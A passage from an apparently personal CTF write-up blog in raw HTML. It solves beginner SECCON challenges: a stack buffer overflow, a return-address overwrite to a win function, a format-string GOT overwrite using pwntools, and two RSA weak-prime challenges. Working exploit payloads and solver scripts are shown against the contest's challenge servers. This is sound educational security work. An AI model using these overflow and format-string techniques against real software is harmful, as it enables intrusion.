class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span 
class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Without needing any real analysis, I just sent the following payload to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01'</span> <span class=\"token operator\">|</span> <span class=\"token function\">nc</span> simpleoverflow.beginners.seccon.games <span class=\"token number\">9000</span></code></pre></div>\n<p><img src=\"/static/dbd60843c29d84ecb6825a7779960a19/65654/image-20240616081357044.png\" alt=\"image-20240616081357044\" /></p>\n<h2 id=\"simpleoverwritepwn\" style=\"position:relative;\"><a href=\"#simpleoverwritepwn\" aria-label=\"simpleoverwritepwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 
1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>simpleoverwrite(Pwn)</h2>\n<blockquote>\n<p>Let’s check the stack and return address.</p>\n</blockquote>\n<p>This was super-easy challenge #2.</p>\n<p>The following code is provided for the challenge binary.</p>\n<p>It’s clear that jumping to the win function will give us the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdint.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">100</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token 
function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">100</span><span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"input:\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x20</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token 
function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"return to: 0x%lx\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>buf<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">18</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span 
class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Looking at the protections, there’s nothing other than NX, so a simple buffer overflow to reach the win function should work.</p>\n<p><img src=\"/static/b130df030f34edc06c1cc1d707dfdd00/a4262/image-20240616081623373.png\" alt=\"image-20240616081623373\" /></p>\n<p>I’ll just use radare2 to verify the address of the win function and the offset of the buffer in the main function.</p>\n<p><img src=\"/static/27cc26307230cc36e8e740399e268f80/29492/image-20240616082009105.png\" alt=\"image-20240616082009105\" /></p>\n<p><img src=\"/static/9278bf02aa97f8a5d0fcf72b29200404/d9199/image-20240616082132183.png\" alt=\"image-20240616082132183\" /></p>\n<p>Using the results above, I sent the payload created with the following command to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">python3 -c <span class=\"token string\">'import sys; from pwn import *; sys.stdout.buffer.write(b\"A\"*0x12 + p64(0x401186))'</span>  <span class=\"token operator\">|</span> <span class=\"token function\">nc</span> simpleoverwrite.beginners.seccon.games <span class=\"token number\">9001</span></code></pre></div>\n<p><img src=\"/static/b05f84c3f85a2c89264bf10ca19f2614/f0551/image-20240616082443122.png\" alt=\"image-20240616082443122\" /></p>\n<h2 id=\"pure-and-easypwn\" style=\"position:relative;\"><a href=\"#pure-and-easypwn\" aria-label=\"pure and easypwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>pure-and-easy(Pwn)</h2>\n<p>This was super-easy challenge #3.</p>\n<p>The following source code is provided for the challenge binary.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">0x100</span><span class=\"token 
punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0xff</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">0x50</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  FILE <span class=\"token operator\">*</span>fp <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x50</span><span class=\"token punctuation\">,</span> fp<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token 
number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>At a glance, it’s clear there is a format string bug (FSB) vulnerability.</p>\n<p>Also, since PIE is disabled and the binary is only Partial RELRO, a GOT overwrite should be straightforward.</p>\n<p><img src=\"/static/b1e8858808b04e5dd866e7284f6d16c2/d48f1/image-20240616082659690.png\" alt=\"image-20240616082659690\" /></p>\n<p>Therefore, I wrote the following solver to execute the win function via a GOT overwrite of the exit function, which is conveniently called right after the vulnerable printf.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set target</span>\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"pure-and-easy.beginners.seccon.games\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">9000</span><span class=\"token punctuation\">)</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token 
string\">\"./chall\"</span>\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\ngot_exit <span class=\"token operator\">=</span> <span class=\"token number\">0x404040</span>\nwin <span class=\"token operator\">=</span> <span class=\"token number\">0x401341</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> fmtstr_payload<span class=\"token punctuation\">(</span>offset<span class=\"token operator\">=</span><span class=\"token number\">6</span><span class=\"token punctuation\">,</span> writes<span class=\"token operator\">=</span><span class=\"token punctuation\">{</span>got_exit<span class=\"token punctuation\">:</span>win<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>write_size<span class=\"token operator\">=</span><span class=\"token string\">\"short\"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"}\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span></code></pre></div>\n<p><img src=\"/static/c9a2892b59799b6ec11b17b927dab9f0/d9199/image-20240616091036238.png\" alt=\"image-20240616091036238\" /></p>\n<p>By the way, I used fmtstr_payload here for convenience, but for more details on FSB and handcrafting payloads, please see the article below.</p>\n<p>Reference: <a href=\"/ctf-pwn-og\">A Beginner CTFer’s Super Introduction to Pwn - FSB Basics and ROP Techniques - Frog’s Secret Base</a></p>\n<h2 id=\"safe-primecrypto\" style=\"position:relative;\"><a href=\"#safe-primecrypto\" aria-label=\"safe primecrypto permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Safe Prime(Crypto)</h2>\n<blockquote>\n<p>Using a safe prime makes RSA secure, doesn’t it?</p>\n</blockquote>\n<p>I solved a Crypto challenge for the first time in a while.</p>\n<p>The following script, along with n, e, and c, is provided for the challenge.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> getPrime<span class=\"token punctuation\">,</span> 
isPrime\n\nFLAG <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{*** REDACTED ***}\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">.</span>from_bytes<span class=\"token punctuation\">(</span>FLAG<span class=\"token punctuation\">,</span> <span class=\"token string\">'big'</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    p <span class=\"token operator\">=</span> getPrime<span class=\"token punctuation\">(</span><span class=\"token number\">512</span><span class=\"token punctuation\">)</span>\n    q <span class=\"token operator\">=</span> <span class=\"token number\">2</span> <span class=\"token operator\">*</span> p <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">if</span> isPrime<span class=\"token punctuation\">(</span>q<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">break</span>\n\nn <span class=\"token operator\">=</span> p <span class=\"token operator\">*</span> q\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nc <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">,</span> e<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n\n<span class=\"token 
keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>n <span class=\"token operator\">=</span> <span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>c <span class=\"token operator\">=</span> <span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since q is generated from p, n can be expressed as a quadratic equation in one variable p.</p>\n<p>Therefore, by using the following solver to solve the equation for p and q, I was able to decrypt the ciphertext and obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> sympy <span class=\"token keyword\">import</span> symbols<span class=\"token punctuation\">,</span> Eq<span class=\"token punctuation\">,</span> solve<span class=\"token punctuation\">,</span> mod_inverse\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> long_to_bytes\n\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\np <span class=\"token operator\">=</span> symbols<span class=\"token punctuation\">(</span><span class=\"token string\">'p'</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> <span class=\"token 
number\">40791470236110804733312817275921324892019927976655404478966109115157033048751614414177683787333122984170869148886461684367352872341935843163852393126653174874958667177632653833127408726094823976937236033974500273341920433616691535827765625224845089258529412235827313525710616060854484132337663369013424587861</span>\nn <span class=\"token operator\">=</span> <span class=\"token number\">292927367433510948901751902057717800692038691293351366163009654796102787183601223853665784238601655926920628800436003079044921928983307813012149143680956641439800408783429996002829316421340550469318295239640149707659994033143360850517185860496309968947622345912323183329662031340775767654881876683235701491291</span>\nequation <span class=\"token operator\">=</span> Eq<span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>p<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">+</span> p<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\nsolutions <span class=\"token operator\">=</span> solve<span class=\"token punctuation\">(</span>equation<span class=\"token punctuation\">,</span> p<span class=\"token punctuation\">)</span>\np <span class=\"token operator\">=</span> solutions<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\nq <span class=\"token operator\">=</span> q <span class=\"token operator\">=</span> <span class=\"token number\">2</span> <span class=\"token operator\">*</span> p <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n<span class=\"token keyword\">assert</span> <span class=\"token punctuation\">(</span>p <span class=\"token operator\">*</span> q<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> n\n\nphi_n <span class=\"token operator\">=</span> <span class=\"token 
punctuation\">(</span>p <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>q <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> mod_inverse<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">,</span> phi_n<span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>c<span class=\"token punctuation\">,</span> d<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>long_to_bytes<span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># ctf4b{R3l4ted_pr1m3s_4re_vuLner4ble_n0_maTt3r_h0W_l4rGe_p_1s}</span></code></pre></div>\n<h2 id=\"mathcrypto\" style=\"position:relative;\"><a href=\"#mathcrypto\" aria-label=\"mathcrypto permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>math(Crypto)</h2>\n<blockquote>\n<p>It seems there are special conditions on the variables used in the RSA encryption…?</p>\n</blockquote>\n<p>The following code along with n, e, c, and ab are provided for the 
challenge.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> bytes_to_long<span class=\"token punctuation\">,</span> isPrime\n<span class=\"token keyword\">from</span> secret <span class=\"token keyword\">import</span> <span class=\"token punctuation\">(</span>\n    x<span class=\"token punctuation\">,</span>\n    p<span class=\"token punctuation\">,</span>\n    q<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span>  <span class=\"token comment\"># x, p, q are secret values, please derive them from the provided other values.</span>\n<span class=\"token keyword\">import</span> gmpy2\n\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">is_square</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">:</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> gmpy2<span class=\"token punctuation\">.</span>isqrt<span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span> <span class=\"token operator\">==</span> n\n\n\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>q<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> p <span class=\"token operator\">!=</span> q\n\na <span class=\"token operator\">=</span> p <span class=\"token operator\">-</span> x\nb <span class=\"token operator\">=</span> 
q <span class=\"token operator\">-</span> x\n<span class=\"token keyword\">assert</span> is_square<span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span>\n\nn <span class=\"token operator\">=</span> p <span class=\"token operator\">*</span> q\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">b\"ctf4b{dummy_f14g}\"</span>\nmes <span class=\"token operator\">=</span> bytes_to_long<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> e<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"n = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>n<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"e = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>e<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token 
punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"cipher = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>c<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"ab = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>a <span class=\"token operator\">*</span> b<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">4701715889239073150754995341656203385876367121921416809690629011826585737797672332435916637751589158510308840818034029338373257253382781336806660731169</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span 